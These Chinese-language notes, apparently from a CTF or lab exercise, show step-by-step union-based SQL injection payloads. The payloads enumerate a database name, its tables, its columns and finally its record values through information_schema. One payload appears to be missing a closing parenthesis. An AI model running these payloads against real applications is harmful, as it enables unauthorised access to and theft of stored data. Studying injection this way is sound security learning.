单引号无回显也无报错,' or 1=1#有回显
order by测试也没特殊回显好像必须要带入sql函数才能回显
直接进行union select
1.查看当前数据库名称
1' or 1=1 union select 1,database(),3 limit 1,2;#--
2.查看数据库表的数量=》得到数据库数量为2 ' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = '库名',3 limit 1,2;#--
3.查1表的名字
' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = '库名' limit 0,1),3 limit 1,2;#--
4.查2表的名字
' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = '库名' limit 1,1),3 limit 1,2;#--
5.查列的数量
' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = '表名' limit 0,1),3 limit 1,2;#--
6.查列的名字
' or 1=1 union select 1,(select column_name from information_schema.columns where table_name = '表名' limit 0,1),3 limit 1,2;#--
7.查字段记录值
1' or 1=1 union select 1,(select 列名 from 表名 limit 0,1),3 limit 1,2;#--